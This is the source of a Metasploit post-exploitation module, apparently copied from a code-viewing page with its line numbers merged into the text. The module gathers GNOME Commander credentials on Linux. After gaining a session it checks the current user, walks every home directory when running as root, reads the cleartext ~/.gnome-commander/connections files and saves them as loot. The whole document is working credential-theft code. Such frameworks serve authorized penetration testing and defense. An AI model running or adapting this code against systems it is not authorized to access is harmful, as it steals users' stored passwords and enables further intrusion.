Path: blob/master/modules/post/linux/gather/gnome_commander_creds.rb
19721 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post6include Msf::Post::File78def initialize(info = {})9super(10update_info(11info,12'Name' => 'Linux Gather Gnome-Commander Creds',13'Description' => %q{14This module collects the clear text passwords stored by15Gnome-commander, a GUI file explorer for GNOME. Typically, these16passwords are stored in the user's home directory, at17~/.gnome-commander/connections.18},19'License' => MSF_LICENSE,20'Author' => [ 'David Bloom' ], # Twitter: @philophobia7821'Platform' => %w[linux],22'SessionTypes' => [ 'meterpreter', 'shell'],23'Notes' => {24'Stability' => [CRASH_SAFE],25'SideEffects' => [],26'Reliability' => []27}28)29)30end3132def run33user_dirs = []34# Search current user35user = cmd_exec('whoami').chomp36# User is root37if user == 'root'38print_status("Current user is #{user}, probing all home dirs")39user_dirs << '/root'40# Search home dirs41cmd_exec('ls /home').each_line.map { |l| user_dirs << "/home/#{l}".chomp }42else43# Non root user44print_status("Current user is #{user}, probing /home/#{user}")45user_dirs << "/home/#{user}"46end47# Try to find connections file in users homes48user_dirs.each do |dir|49# gnome-commander connections file50connections_file = "#{dir}/.gnome-commander/connections"51if file?(connections_file)52# File.exist53begin54str_file = read_file(connections_file)55print_good("File found: #{connections_file}")56vprint_line(str_file)57# Store file58p = store_loot('connections', 'text/plain', session, str_file, connections_file, 'Gnome-Commander connections')59print_good("Connections file saved to #{p}")60rescue EOFError61# If there's nothing in the file, we hit EOFError62print_error("Nothing read from file: #{connections_file}, file may be empty")63end64else65# File not found66vprint_error("File not found: #{connections_file}")67end68end69end70end717273